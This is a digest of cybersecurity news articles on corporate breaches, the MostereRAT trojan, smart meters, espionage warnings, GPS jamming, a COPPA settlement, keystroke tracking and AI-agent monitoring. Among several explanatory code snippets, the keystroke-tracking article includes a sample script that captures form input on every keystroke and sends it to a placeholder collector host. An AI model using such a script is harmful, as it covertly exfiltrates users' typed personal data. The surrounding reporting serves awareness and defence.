Restaurant Brands International faces cybersecurity flaws as ethical hackers expose data security risks

 

Restaurant Brands International (RBI), the parent company of Burger King, Tim Hortons, and Popeyes, has come under scrutiny after two ethical hackers uncovered major cybersecurity flaws across its digital systems. The researchers, known by their handles BobDaHacker and BobTheShoplifter, revealed how weak security practices left RBI’s global operations, spanning more than 30,000 outlets, dangerously exposed. Their findings, once detailed in a blog that has since been archived, highlight critical oversights in RBI’s approach to data security.  

Among the most concerning discoveries was a password hard-coded into the HTML of an equipment ordering site, a lapse that would typically raise alarms in even the most basic security audits. In another instance, the hackers found that the drive-through tablet system used the password “admin,” a default credential considered one of the most insecure in the industry. Such weak safeguards left RBI vulnerable to unauthorized access, calling into question the company’s investment in even the most fundamental cybersecurity measures. 

The hackers went further, demonstrating access to employee accounts, internal configurations, and raw audio files from drive-through conversations. These recordings, sometimes containing fragments of personal information, were later processed by artificial intelligence to evaluate customer interactions and staff performance. While the hackers emphasized that they did not retain or misuse any data, their ability to reach such sensitive systems underscores the potential risks had malicious actors discovered the same flaws. 

Their probe also extended into unexpected areas, such as software linked to bathroom rating screens in restaurants. While they joked about leaving fake reviews remotely, the researchers remained committed to responsible disclosure, ensuring no disruption to RBI’s operations. Nevertheless, the ease with which they navigated these systems illustrates how deeply embedded vulnerabilities had gone unnoticed. 

Other problems included APIs that allowed unrestricted sign-ups, plain-text emails containing passwords, and methods to escalate privileges to administrator access across platforms. These oversights are precisely the kinds of risks that fundamental cybersecurity practices are designed to prevent. According to the ethical hackers, RBI’s overall digital defenses could best be described as “catastrophic,” which they humorously compared to a paper Whopper wrapper in the rain. 

Although RBI reportedly addressed the vulnerabilities after being informed, the company has not publicly acknowledged the hackers or commented on the severity of the issues. This lack of transparency raises concerns about whether the incident will lead to lasting security reforms or if it will be treated as a quick fix before moving on. For a multinational corporation handling sensitive customer interactions daily, the revelations serve as a stark warning about the consequences of neglecting cybersecurity fundamentals.

MostereRAT Malware Leverages Evasion Tactics to Foil Defenders

 


As cybercrime grows increasingly sophisticated, security researchers have uncovered a stealthy phishing campaign deploying a powerful malware strain called MostereRAT. This remote access trojan allows attackers to take full control of infected systems and operate them as though they were physically at the keyboard. 

Fortinet's FortiGuard Labs recently revealed that the campaign uses an array of advanced evasion techniques to bypass traditional defenses and remain undetected for extended periods of time. The operation is characterized by its unconventional use of Easy Programming Language (EPL), a visual programming tool used mainly in China and seldom seen in such operations. 

EPL is used to construct staged payloads, obscure malicious activity, and systematically disable security systems. Researchers report that the phishing emails, aimed primarily at Japanese users with business-related lures, lead victims to booby-trapped documents embedded within ZIP archives, ultimately enabling the deployment of MostereRAT. 

The campaign, designed to siphon sensitive information, is strikingly sophisticated: once inside a computer, it extends its reach by installing secondary plugins, secures its communication with mutual TLS (mTLS), and even installs additional remote access utilities, highlighting its calculated design and its dangerous adaptability after the initial compromise. 

According to FortiGuard Labs, which identified the threat, the campaign distinguishes itself through a layered approach to evasion that makes it very difficult to detect. Notably, the code is written in Easy Programming Language (EPL), a Simplified Chinese-based programming language rarely used in cyberattacks, which allows the attackers to conceal malicious activity by staging the payload in multiple steps. 

Once deployed on an enterprise network, MostereRAT can disable security tools, block antivirus traffic, and establish encrypted communications with its command-and-control (C2) infrastructure, all over mutual TLS (mTLS). Infection chains begin with phishing emails crafted to appear as legitimate business inquiries, with a particular emphasis on Japanese users. 

These messages direct unsuspecting recipients to download a Microsoft Word file containing a hidden ZIP archive, which in turn executes a concealed payload. The malware then decrypts the executable's components, installs them in the system directory, and sets up persistence mechanisms, some of which operate with SYSTEM-level privileges to maximize control. 

Moreover, the malware displays a deceptive message in Simplified Chinese claiming that the file is incompatible, further disguising its presence. This tactic deflects suspicion by making it appear that the file simply failed to open. Researchers also noted that the attack flows and associated C2 domains trace back to infrastructure first reported by a security researcher in 2020 as part of a banking trojan campaign. 

Since then, the threat has evolved into a fully fledged remote access trojan now known as MostereRAT. 

Yurren Wan, a researcher at FortiGuard Labs, rated the campaign as high severity, primarily because it integrates multiple advanced techniques that allow adversaries to remain undetected while keeping complete control of compromised systems. 

By disabling security defenses and hiding behind legitimate remote access tools, attackers are able to operate in plain sight. Wan noted that one of the most distinctive aspects of this campaign is its use of unconventional methods: it is coded in Easy Programming Language (EPL), intercepts and blocks antivirus traffic at the network level, and can even escalate privileges to TrustedInstaller, capabilities rarely found in standard malware attacks. 

Once active on a target system, MostereRAT can record keystrokes, exfiltrate sensitive data, create hidden administrator accounts, and use tools such as AnyDesk and TightVNC to maintain long-term persistence. According to Wan, defending against such intrusions requires a layered approach that combines advanced technical safeguards with sustained user awareness. 

He added that companies should ensure their FortiGate, FortiClient, and FortiMail deployments carry the latest FortiGuard security updates, while channel partners can help by guiding customers toward a managed detection and response (MDR) strategy and encouraging training such as the free Fortinet Certified Fundamentals (FCF) course to strengthen defenses further. 

Lauren Rucker, senior cyber threat intelligence analyst at Deepwatch, emphasized that browser security is a crucial line of defense against the phishing emails at the heart of the campaign. She added that restricting automatic downloads and tightening user privilege controls can significantly reduce the risk of escalation to SYSTEM or TrustedInstaller. Once installed, MostereRAT uses multiple techniques to undermine a computer's security. 

It disables Microsoft updates, terminates antivirus processes, and prevents security software from communicating with its vendors' servers. By impersonating the highly privileged TrustedInstaller account, the malware escalates privileges, allowing attackers to take over the system almost completely. 

James Maude, acting chief technology officer at BeyondTrust, explained that by combining an obscure scripting language with trusted remote access tools, the campaign exploits overprivileged users and endpoints that lack strong application control. 

MostereRAT maintains an extensive list of targeted security products, including 360 Safe, Kingsoft Antivirus, Tencent PC Manager, Windows Defender, ESET, Avira, Avast, and Malwarebytes. It uses Windows Filtering Platform (WFP) filters to block network traffic from these tools, effectively preventing them from reaching their vendors' servers to send detection alerts or telemetry. 

In addition, researchers found that one of the malware's core modules, elsedll.db, provides robust remote access secured with mutual TLS (mTLS) authentication and supports 37 distinct commands, ranging from file manipulation and payload delivery to screen capture and user identification. More concerning still, the malware deliberately installs and configures legitimate tools such as AnyDesk, TightVNC, and RDP Wrapper to create hidden backdoors for long-term use. 
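For readers unfamiliar with mutual TLS, both sides of the connection present certificates and each trusts only the other's private certificate authority, which is why such traffic is hard to intercept or impersonate. The sketch below is a generic client-side illustration in TypeScript (Node.js) with hypothetical host and file names; it is not MostereRAT's code, only the handshake concept.

```typescript
import { connect } from "node:tls";
import { readFileSync } from "node:fs";

// Hypothetical names throughout; this only illustrates the mTLS handshake itself.
const socket = connect(
  {
    host: "c2.example.net",              // placeholder server
    port: 8443,
    key: readFileSync("client.key"),     // client private key: the client proves its own identity
    cert: readFileSync("client.crt"),    // client certificate presented to the server
    ca: [readFileSync("ca.crt")],        // only certificates signed by this private CA are trusted
    rejectUnauthorized: true,            // refuse any server that cannot prove membership of that CA
  },
  () => {
    // At this point both endpoints have authenticated each other with certificates.
    console.log("mutual TLS established, peer verified:", socket.authorized);
    socket.end();
  }
);
```

Because each side accepts only the other's private certificate authority, an ordinary TLS-inspection proxy cannot quietly sit in the middle, which is one reason layered network and endpoint telemetry matters for detection.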

To maintain exclusive control over these utilities, the attackers stealthily modify the registry and conceal the tools from system users. Experts warn that the campaign marks an important evolution in remote access trojans, combining advanced evasion techniques, social engineering, and the abuse of legitimate tools to achieve persistent compromise, and it underscores the importance of strong security hygiene, strict endpoint controls, and ongoing user awareness training. 

The discovery of MostereRAT underscores how far cybercriminal operations have evolved, moving beyond rudimentary malware to campaigns that combine technical innovation with careful planning. For companies, the real challenge is not only deploying updated security products but also adopting a layered, forward-looking defense strategy that anticipates such threats before they become a problem. 

Measures such as tightening user privilege policies, improving browser security, and increasing endpoint visibility can help minimize exposure; regular awareness programs remain crucial to reduce the success rate of phishing lures. 

Furthermore, by partnering with managed security providers, organizations can gain access to expertise in detection, response, and continuous monitoring that most find difficult to maintain in-house. Adversaries will continue to exploit overlooked vulnerabilities and legitimate tools to their advantage, which is why threats like MostereRAT are on the rise. 

In this environment, resilient defenses require more than reactive fixes: they demand a culture of preparedness, disciplined operational practices, and a commitment to staying one step ahead of a threat landscape that continues to evolve rapidly.

Smart Meters: A Growing Target in Data Security

 



Smart electricity meters, once simple devices for recording household consumption, are now central to modern energy systems. They track usage patterns, support grid balancing, and enable predictive maintenance. But as their role has expanded, so has the volume of sensitive data they collect and store, making these devices an overlooked but critical point of vulnerability in the cybersecurity infrastructure.


Why stored data matters

Cybersecurity discussions usually focus on network protections, but the data inside the meters deserves equal attention. Information such as billing records, diagnostic logs, and configuration files can be misused if tampered with or exposed. Since smart meters often stay in use for decades, even a small compromise can quietly escalate into large-scale billing disputes, compliance failures, or inaccurate demand forecasts.


The cost of weak protection

Safeguarding these devices is not just a technology issue; it directly affects finances and reputation. A successful cyberattack can drain companies of thousands of dollars per minute, while also damaging customer trust and inviting regulatory penalties. At the same time, manufacturers face rising costs for secure hardware, software optimization, and the dedicated teams required to manage threats over a device’s lifetime.


New rules setting higher standards

In Europe, the upcoming Cyber Resilience Act (CRA) will set stricter requirements for digital products, including smart meters. By 2027, companies selling in the EU must ensure devices launch without known vulnerabilities, arrive with secure default settings, and receive patches throughout their lifespan. Manufacturers will also be obligated to provide transparent documentation, covering everything from software components to lifecycle support.


Building resilience into design

Experts stress that resilience must be engineered from the start. Three pillars define effective smart meter security:

1. Confidentiality: encrypting stored data and managing keys securely.

2. Integrity: ensuring information is not altered or lost during failures.

3. Authenticity: verifying updates and communications through trusted digital signatures.

Together, these measures protect the accuracy and reliability of the data on which modern energy systems depend.
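
As a concrete illustration of the third pillar, authenticity, the sketch below shows a generic signed-update check in TypeScript (Node.js). The file names and key format are hypothetical, and real meters perform this check in firmware rather than a script; the point is simply that an update is applied only if it verifies against the vendor's public key.

```typescript
import { createVerify } from "node:crypto";
import { readFileSync } from "node:fs";

// Hypothetical artifacts: the update image, its detached signature, and the vendor's public key.
const firmware = readFileSync("meter-update.bin");
const signature = readFileSync("meter-update.bin.sig");
const vendorPublicKey = readFileSync("vendor-public.pem", "utf8");

const verifier = createVerify("sha256"); // hash the image, then check the signature against it
verifier.update(firmware);
verifier.end();

if (verifier.verify(vendorPublicKey, signature)) {
  console.log("Signature valid: update is authentic and unmodified.");
} else {
  console.error("Signature check failed: reject the update.");
}
```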


Organisational readiness

Beyond technology, companies must foster a culture of security. That means maintaining software inventories (SBOMs), conducting supply chain risk assessments, preparing incident response plans, and training staff in best practices. Limiting data retention and enforcing role-based access controls reduce exposure further.

The rise of quantum computing could eventually render today’s encryption obsolete. Manufacturers are therefore urged to build cryptographic agility into devices, allowing them to adapt to stronger algorithms as standards evolve.



Czechia Warns of Chinese Data Transfers and Espionage Risks to Critical Infrastructure

 

Czechia’s National Cyber and Information Security Agency (NÚKIB) has issued a stark warning about rising cyber espionage campaigns linked to China and Russia, urging both government institutions and private companies to strengthen their security measures. The agency classified the threat as highly likely, citing particular concerns over data transfers to China and remote administration of assets from Chinese territories, including Hong Kong and Macau. According to the watchdog, these operations are part of long-term efforts by foreign states to compromise critical infrastructure, steal sensitive data, and undermine public trust. 

The agency’s concerns are rooted in China’s legal and regulatory framework, which it argues makes private data inherently insecure. Laws such as the National Intelligence Law of 2017 require all citizens and organizations to assist intelligence services, while the 2015 National Security Law and the 2013 Company Law provide broad avenues for state interference in corporate operations. Additionally, regulations introduced in 2021 obligate technology firms to report software vulnerabilities to government authorities within two days while prohibiting disclosure to foreign organizations. NÚKIB noted that these measures give Chinese state actors sweeping access to sensitive information, making foreign businesses and governments vulnerable if their data passes through Chinese systems. 

Hong Kong and Macau also fall under scrutiny in the agency’s assessment. In Hong Kong, the 2024 Safeguarding National Security Ordinance integrates Chinese security laws into its own legal system, broadening the definition of state secrets. Macau’s 2019 Cybersecurity Law grants authorities powers to monitor data transmissions from critical infrastructure in real time, with little oversight to prevent misuse. NÚKIB argues that these developments extend the Chinese government’s reach well beyond its mainland jurisdiction. 

The Czech warning gains credibility from recent attribution efforts. Earlier this year, Prague linked cyberattacks on its Ministry of Foreign Affairs to APT31, a group tied to China’s Ministry of State Security, in a campaign active since 2022. The government condemned the attacks as deliberate attempts to disrupt its institutions and confirmed a high degree of certainty about Chinese involvement, based on cooperation among domestic and international intelligence agencies. 

These warnings align with broader global moves to limit reliance on Chinese technologies. Countries such as Germany, Italy, and the Netherlands have already imposed restrictions, while the Five Eyes alliance has issued similar advisories. For Czechia, the implications are serious: NÚKIB highlighted risks across devices and systems such as smartphones, cloud services, photovoltaic inverters, and health technology, stressing that disruptions could have wide-reaching consequences. The agency’s message reflects an ongoing effort to secure its digital ecosystem against foreign influence, particularly as geopolitical tensions deepen in Europe.

Why Cybersecurity is Critical for Protecting Spatial Data



In a world where almost every service depends on digital connections, one type of information underpins much of our daily lives: spatial data. This data links activities to a place and time, revealing not just “where” something happens, but also “when,” “how,” and sometimes even “why.” Its importance spans a wide range of fields, including transportation, agriculture, climate science, disaster management, urban planning, and national security.


The power of spatial data

Spatial data is collected constantly by satellites, GPS receivers, drones, advanced sensors, and connected devices. Combined with 5G networks, cloud platforms, and artificial intelligence, this information is transformed from raw coordinates into actionable insights. It enables predictive models, smart city planning, and digital twins, virtual copies of physical systems that simulate real-world conditions. In short, spatial data is no longer static; it drives decisions in real time.


The security challenges

Its value, however, makes it a prime target for cyber threats. Three major risks stand out:

Loss of confidentiality: Unauthorized access to location data can expose sensitive details, from an individual’s daily routine to the supply routes of critical industries. This creates openings for stalking, fraud, corporate espionage, and even threats to national security.

Manipulation of data: One of the most dangerous scenarios is GPS spoofing, where attackers send fake signals to alter a device’s calculated position. If navigation systems on ships, aircraft, or autonomous vehicles are misled, the consequences can be catastrophic.

Denial of access: When spatial services are disrupted through jamming or cyberattacks, emergency responders, airlines, and logistics companies may be forced to halt operations. In some cases, entire networks have been shut down for days to contain breaches.

Securing spatial data requires a mix of governance, technical safeguards, and intelligence-led defences. Organizations must classify datasets by their sensitivity, since the location of a retail outlet carries far less risk than the coordinates of critical infrastructure. Training specialists to handle spatial data responsibly is equally important.

On the technical front, strong encryption, strict access controls, and continuous monitoring are basic necessities. Integrity checks and tamper detection can ensure that location records remain accurate, while well-tested recovery plans help reduce downtime in case of an incident.
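
One simple way to implement such an integrity check is to store a keyed hash (HMAC) alongside each location record and recompute it whenever the record is read back. The sketch below is a generic illustration in TypeScript (Node.js) with hypothetical record fields and key handling; it is not any specific product's mechanism.

```typescript
import { createHmac, timingSafeEqual } from "node:crypto";

// Hypothetical record and secret key, used only for illustration.
const integrityKey = Buffer.from("replace-with-a-securely-stored-key");
const record = JSON.stringify({
  assetId: "pump-station-7",
  lat: 52.3702,
  lon: 4.8952,
  ts: "2025-09-01T10:00:00Z",
});

// Compute the tag when the record is written...
const storedTag = createHmac("sha256", integrityKey).update(record).digest();

// ...and recompute it when the record is read back.
const recomputed = createHmac("sha256", integrityKey).update(record).digest();
const intact =
  storedTag.length === recomputed.length && timingSafeEqual(storedTag, recomputed);

console.log(intact ? "record intact" : "record tampered or corrupted");
```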

Finally, intelligence-driven security shifts the focus from reacting to threats to anticipating them. By analysing attacker behaviour and emerging vulnerabilities, organizations can strengthen weak points in advance. Privacy-preserving techniques such as masking or differential privacy allow data to be used without exposing individuals. At the same time, technologies like blockchain add tamper resistance, and AI tools help detect anomalies at scale.
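
To show what location masking can look like in practice, the sketch below adds Laplace-distributed noise to a coordinate pair, the basic idea behind many differential-privacy-style protections. The noise scale is an arbitrary example; real deployments calibrate it to a formal privacy budget.

```typescript
// Sample Laplace(0, scale) noise via the inverse-CDF method.
function laplaceNoise(scale: number): number {
  const u = Math.random() - 0.5;
  return -scale * Math.sign(u) * Math.log(1 - 2 * Math.abs(u));
}

// Blur a coordinate pair; ~0.001 degrees is roughly 100 m of latitude (illustrative scale only).
function maskLocation(lat: number, lon: number, scale = 0.001): [number, number] {
  return [lat + laplaceNoise(scale), lon + laplaceNoise(scale)];
}

console.log(maskLocation(52.3702, 4.8952)); // aggregate patterns survive, exact positions do not
```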

Spatial data has the power to make societies more efficient, resilient, and sustainable. But without strong cybersecurity, its benefits can quickly turn into risks. Recognizing its vulnerabilities and implementing layered protections is no longer optional; it is the only way to ensure that this valuable resource continues to serve people safely.



Beyond Firewalls: How U.S. Schools Are Building a Culture of Cyber Safety

 

U.S. school districts are facing a surge in sophisticated cyberattacks, but they are pushing back by combining strong fundamentals, people-centered training, state partnerships, and community resilience planning to build cyber safety into everyday culture. 

Rising threat landscape 

An Arizona district’s 2024 near-miss shows how fast attacks unfold and why incident response planning and EDR matter; swift VPN cutoff and state-provided CrowdStrike support helped prevent damage during a live intrusion window of mere hours. 

Broader data from the 2025 CIS MS-ISAC K-12 report underscores the scale: 82% of reporting schools experienced cyber impacts between July 2023 and December 2024, with more than 9,300 confirmed incidents, reflecting increased adversary sophistication and strategic timing against educational operations. Districts hold sensitive student and family data, making identity theft, fraud, and extortion high-risk outcomes from breaches. 

AI-boosted phishing and the human firewall 

Technology leaders report that generative AI has made phishing emails far more convincing, even fooling seasoned staff, shifting emphasis to continuous, culture-wide awareness training. 

Districts are reframing users as the first line of defense, deploying role-based training through platforms like KnowBe4 and CyberNut, and reinforcing desired behaviors with incentives that make reporting suspicious emails a source of pride rather than punishment. 

This people-first approach aligns with expert guidance that “cybersecurity is really cybersafety,” requiring leadership beyond IT to model and champion safe digital practices. 

Tools, partnerships, and equity

Well-resourced or larger districts layer EDR/MDR/NDR, AI email filtering, vendor monitoring, and regular penetration testing, demonstrating rapid detection and response in live red-team exercises. 

Smaller systems rely critically on state-backed programs—such as Arizona’s Statewide Cyber Readiness Program or Indiana’s university-led assessments—that supply licenses, training, and risk guidance otherwise out of reach. 

Nationally, MS-ISAC provides no-cost incident response, advisory services, and threat intelligence, with assessments like the NCSR linked to measurable maturity gains, reinforcing the value of shared services for K-12. 

Back to basics and resilience

Experts stress that fundamentals—timely patching, account audits, strong passwords, and MFA—block a large share of intrusions, with mismanaged legacy accounts and unpatched systems among the most frequently exploited weaknesses. 

Recovery costs swing widely, but preparation and in-house response can dramatically reduce impact, while sector-wide averages show high breach costs and constrained cyber budgets that heighten the need for prioritization. 

Looking forward, districts are institutionalizing tabletop exercises, mutual aid pacts, and statewide collaboration so no school faces an incident alone, operationalizing community resilience as a strategic defense layer.

Massive database of 250 million records leaked online for public access


Around a quarter of a billion identity records were left publicly accessible, exposing people located in seven countries: Saudi Arabia, the United Arab Emirates, Canada, Mexico, South Africa, Egypt, and Turkey. 

According to experts from Cybernews, three misconfigured servers, with IP addresses registered in the UAE and Brazil, contained personal information amounting to “government-level” identity profiles. The leaked data included contact details, dates of birth, ID numbers, and home addresses. 

The Cybernews experts who found the leak said the databases shared similar naming conventions and structure, hinting at a common source, but they could not identify the actor responsible for running the servers. 

“These databases were likely operated by a single party, due to the similar data structures, but there’s no attribution as to who controlled the data, or any hard links proving that these instances belonged to the same party,” they said. 

The leak is particularly concerning for citizens in South Africa, Egypt, and Turkey, as the databases there contained full-spectrum data. 

The exposure left the affected individuals open to multiple threats, such as phishing campaigns, scams, financial fraud, and other abuses.

Currently, the database is not publicly accessible (a good sign). 

This is not the first incident in which a massive database of citizen data, on the order of 250 million records, has been exposed online. Earlier Cybernews research revealed a separate leak that may have impacted the entire population of Brazil.

In that case, a misconfigured Elasticsearch instance exposed details such as names, sex, dates of birth, and Cadastro de Pessoas Físicas (CPF) numbers, the identifier used for taxpayers in Brazil. 

Russia’s Widespread GPS Jamming Raises Concerns for Air and Sea Safety

 


A recent incident involving the European Commission President’s aircraft has drawn attention to a growing risk in international travel: deliberate interference with satellite navigation systems. The plane, flying into Plovdiv, Bulgaria, temporarily lost its GPS signal due to electronic jamming but landed without issue. Bulgarian authorities later said the disruption was not unusual, describing such interference as a side effect of the ongoing war in Ukraine.

This case is not isolated. Aviation and maritime authorities across Europe have reported an increasing number of GPS disruptions since Russia’s invasion of Ukraine in 2022. Analysts estimate there have been dozens of such events in recent years, affecting flights, shipping routes, and even small private aircraft. Nordic and Baltic nations, in particular, have issued repeated warnings about interference originating near Russian borders.


How GPS jamming works

Satellite navigation relies on faint signals transmitted from orbit. Devices such as aircraft systems, cars, ships, and even smartphones calculate their exact location by comparing timing signals from multiple satellites. These signals, however, are fragile.

Jamming overwhelms the receiver with stronger radio noise, making it impossible to lock onto satellites. Spoofing takes it further by transmitting fake signals that mimic satellites, tricking receivers into reporting false positions. Both techniques have long been used in military operations. For instance, jamming can block incoming drones or missiles, while spoofing can disguise troop or aircraft movements. Experts say such technology has been used not only in Ukraine but also in other conflicts, such as alleged Israeli operations against Iranian air defenses.
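
The arithmetic behind that fragility is simple: a receiver converts a signal's travel time into a distance at the speed of light, so even microsecond-level timing errors or forgeries translate into hundreds of metres of position error. The sketch below is only a back-of-the-envelope illustration, not a real receiver's position solver.

```typescript
const SPEED_OF_LIGHT = 299_792_458; // metres per second

// Distance implied by a signal's travel time (a "pseudorange").
function pseudorange(travelTimeSeconds: number): number {
  return travelTimeSeconds * SPEED_OF_LIGHT;
}

// A spoofer that shifts the apparent timing by just one microsecond
// moves the implied distance by roughly 300 metres.
const errorMetres = pseudorange(1e-6);
console.log(`1 microsecond of timing error is about ${errorMetres.toFixed(0)} m of range error`);
```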


Rising incidents across Europe

Countries bordering Russia report sharp increases in interference. Latvia’s communications authority documented more than 800 cases of satellite disruption in 2024, compared with only a few dozen two years earlier. Finland’s national airline even suspended flights to the Estonian city of Tartu after two aircraft struggled to land due to lost GPS guidance. Similarly, Britain’s defense secretary experienced jamming while flying near Russian territory.

The interference is not limited to aviation. Sweden has received reports of ships in the Baltic Sea losing signal, prompting officials to advise sailors to fall back on radar and landmarks. In one case, two German tourists accidentally crossed into Russian airspace in a light aircraft and had to be escorted back. Such episodes underline how civilian safety is affected by what many governments see as deliberate Russian tactics.


Risks and responses

Experts emphasize that aircraft and ships are equipped with backup systems, including radio beacons and inertial navigation, meaning total reliance on satellites is unnecessary. Yet the danger lies in moments of confusion or equipment failure, when loss of GPS could tip a situation into crisis.

Authorities are responding by restricting drone flights near interference hotspots, training crews to operate without GPS, and pressing international organizations to address the issue. While Russia dismisses complaints as political, analysts warn that disruptions serve a dual purpose: defending Russian airspace while sowing uncertainty among its neighbors.

As incidents multiply, the concern is that one miscalculation could lead to a major accident, particularly at sea, where heavy reliance on GPS has become the norm.


Disney to Pay $10 Million Fine in FTC Settlement Over Child Data Collection on YouTube

 

Disney has agreed to pay millions of dollars in penalties to resolve allegations brought by the Federal Trade Commission (FTC) that it unlawfully collected personal data from young viewers on YouTube without securing parental consent. Federal law under the Children’s Online Privacy Protection Act (COPPA) requires parental approval before companies can gather data from children under the age of 13. 

The case, filed by the U.S. Department of Justice on behalf of the FTC, accused Disney Worldwide Services Inc. and Disney Entertainment Operations LLC of failing to comply with COPPA by not properly labeling Disney videos on YouTube as “Made for Kids.” This mislabeling allegedly allowed the company to collect children’s data for targeted advertising purposes. 

“This case highlights the FTC’s commitment to upholding COPPA, which ensures that parents, not corporations, control how their children’s personal information is used online,” said FTC Chair Andrew N. Ferguson in a statement. 

As part of the settlement, Disney will pay a $10 million civil penalty and implement stricter mechanisms to notify parents and obtain consent before collecting data from underage users. The company will also be required to establish a panel to review how its YouTube content is designated. According to the FTC, these measures are intended to reshape how Disney manages child-directed content on the platform and to encourage the adoption of age verification technologies. 

The complaint explained that Disney opted to designate its content at the channel level rather than individually marking each video as “Made for Kids” or “Not Made for Kids.” This approach allegedly enabled the collection of data from child-directed videos, which YouTube then used for targeted advertising. Disney reportedly received a share of the ad revenue and, in the process, exposed children to age-inappropriate features such as autoplay.  

The FTC noted that YouTube first introduced mandatory labeling requirements for creators, including Disney, in 2019 following an earlier settlement over COPPA violations. Despite these requirements, Disney allegedly continued mislabeling its content, undermining parental safeguards. 

“The order penalizes Disney’s abuse of parental trust and sets a framework for protecting children online through mandated video review and age assurance technology,” Ferguson added. 

The settlement arrives alongside an unrelated investigation launched earlier this year by the Federal Communications Commission (FCC) into alleged hiring practices at Disney and its subsidiary ABC. While separate, the two cases add to the regulatory pressure the entertainment giant is facing. 

The Disney case underscores growing scrutiny of how major media and technology companies handle children’s privacy online, particularly as regulators push for stronger safeguards in digital environments where young audiences are most active.

Study Reveals 40% of Websites Secretly Track User Keystrokes Before Form Submission

 

Researchers from UC Davis, Maastricht University, and other institutions have uncovered widespread silent keystroke interception across websites, revealing that many sites collect user typing data before forms are ever submitted. The study examined how third-party scripts capture and share information in ways that may constitute wiretapping under California law. 

Research methodology 

The research team analyzed 15,000 websites using a custom web crawler and discovered alarming privacy practices. They found that 91 percent of sites used event listeners—JavaScript code that detects user actions like typing, clicking, or scrolling. While most event listeners serve basic functions, a significant portion monitor typing activities in real time. 
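
To make the mechanism concrete, the snippet below is a simplified, hypothetical example of the kind of script the study describes (the collector URL and selectors are invented): it listens to every keystroke in a form field and transmits the current value before the user ever submits the form.

```typescript
// Hypothetical third-party tracking snippet; the endpoint and field selection are invented.
document
  .querySelectorAll<HTMLInputElement>("input[type=email], input[type=text], textarea")
  .forEach((field) => {
    field.addEventListener("input", () => {
      // Fires on every keystroke, long before (or even without) form submission.
      navigator.sendBeacon(
        "https://collector.example/capture",
        JSON.stringify({ field: field.name, value: field.value }),
      );
    });
  });
```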

Key findings revealed that 38.5 percent of websites had third-party scripts capable of intercepting keystrokes. More concerning, 3.18 percent of sites actually transmitted intercepted keystrokes to remote servers, behavior that researchers note matches the technical definition of wiretapping under California's Invasion of Privacy Act (CIPA). 

Data collection and privacy violations 

The captured data included email addresses, phone numbers, and free text entered into forms. In documented cases, email addresses typed into forms were later used for unsolicited marketing emails, even when users never submitted the forms. Co-author Shaoor Munir emphasized that email addresses serve as stable identifiers, enabling cross-site tracking and data broker enrichment. 

Legal implications 

Legal implications center on CIPA's strict two-party consent requirement, unlike federal wiretapping laws requiring only one-party consent. The study provides evidence that some tracking practices could qualify as wiretapping, potentially enabling private lawsuits since enforcement doesn't rely solely on government action. 

Privacy risks and recommendations

Privacy risks extend beyond legal compliance. Users have minimal control over data once it leaves their browsers, with sensitive information collected and shared without disclosure. Munir highlighted scenarios where users type private information then delete it without submitting, unaware that data was still captured and transmitted to third parties. 

This practice violates user expectations on two levels: that only first-party websites access provided information, and that only submitted information reaches different parties. For organizations, customer trust erosion poses significant risks when users discover silent keystroke capture. 

The researchers recommend regulatory clarity, treating embedded analytics and session-replay vendors as third parties unless users expressly consent. They also advocate updating federal consent requirements to mirror CIPA's two-party protection standards, ensuring nationwide user privacy protection.

Exabeam Extends Proven Insider Threat Detection to AI Agents with Google Cloud

 



BROOMFIELD, Colo. & FOSTER CITY, Calif. – September 9, 2025 – At Google Cloud’s pioneering Security Innovation Forum, Exabeam, a global leader in intelligence and automation that powers security operations, today announced the integration of Google Agentspace and Google Cloud’s Model Armor telemetry into the New-Scale Security Operations Platform. This integration gives security teams the ability to monitor, detect, and respond to threats from AI agents acting as digital insiders. This visibility gives organizations insight into the behavior of autonomous agents to reveal intent, spot drift, and quickly identify compromise.

Recent findings in the “From Human to Hybrid: How AI and the Analytics Gap are Fueling Insider Risk” study from Exabeam reveal that a vast majority (93%) of organizations worldwide have either experienced or anticipate a rise in insider threats driven by AI, and 64% rank insiders as a higher concern than external threat actors. As AI agents perform tasks on behalf of users, access sensitive data, and make independent decisions, they introduce a new class of insider risk: digital actors operating beyond the scope of traditional monitoring. Just as insider threats have traditionally been classified as malicious, negligent, and compromised, AI agents now bring their own risks: malfunctioning, misaligned, or outright subverted.

SIEM and XDR solutions that are unable to baseline and learn normal behavior lack the intelligence necessary to identify when agents go rogue. As a pioneer in machine learning and behavioral analytics, Exabeam addresses this critical gap by extending its proven capabilities to monitor both human and AI agent activity. By integrating telemetry from Google Agentspace and Google Cloud’s Model Armor into the New-Scale Platform, Exabeam is expanding the boundaries of behavioral analytics and setting a new standard for what modern security platforms must deliver.
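
Behavioral baselining is conceptually simple even though production analytics are far more sophisticated: learn what normal activity looks like for each identity, human or AI agent, then score deviations from that baseline. The toy sketch below illustrates the idea only; it is not Exabeam's implementation.

```typescript
// Toy behavioral baseline: score today's activity count against an identity's own history.
function anomalyScore(history: number[], today: number): number {
  const mean = history.reduce((sum, x) => sum + x, 0) / history.length;
  const variance = history.reduce((sum, x) => sum + (x - mean) ** 2, 0) / history.length;
  const stdDev = Math.sqrt(variance) || 1; // avoid dividing by zero for flat histories
  return (today - mean) / stdDev;          // a z-score: how unusual is today?
}

// Hypothetical agent that normally reads 40-60 documents a day, then suddenly reads 800.
const history = [44, 51, 39, 60, 47, 55, 42];
console.log(anomalyScore(history, 800).toFixed(1)); // a large positive score warrants investigation
```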

“This is a natural evolution of our leadership in insider threat detection and behavioral analytics,” said Steve Wilson, Chief AI and Product Officer at Exabeam. “Exabeam solutions are inherently designed to deliver behavioral analytics at scale. Security operations teams don’t need another tool — they need deeper insight into both human and AI agent behavior, delivered through a platform they already trust. We’re giving security teams the clarity, context, and control they need to secure the new class of insider threats.”

The company’s latest innovation, Exabeam Nova, is central to this, serving as the intelligence layer that enables security teams to interpret and act on agent behavior with confidence. Exabeam Nova delivers explainable, prioritized threat insights by analyzing the intent and execution patterns of AI agents in real time. This capability allows analysts to move beyond surface-level alerts and understand the context behind agent actions — whether they represent legitimate automation or potential misuse. By operationalizing telemetry from Google Agentspace and Google Cloud’s Model Armor in the New-Scale Platform, Exabeam Nova equips security teams to defend against the next generation of insider threats with clarity and precision.

“AI agents are quickly changing how business gets done, and that means security must evolve at the same rate,” said Chris O’Malley, CEO at Exabeam. “This is a pivotal moment for the cybersecurity industry. By extending our behavioral analytics to AI agents, Exabeam is once again leading the way in insider threat detection. We’re giving security teams the visibility and control they need to protect the integrity of their operations in an AI-driven world.”

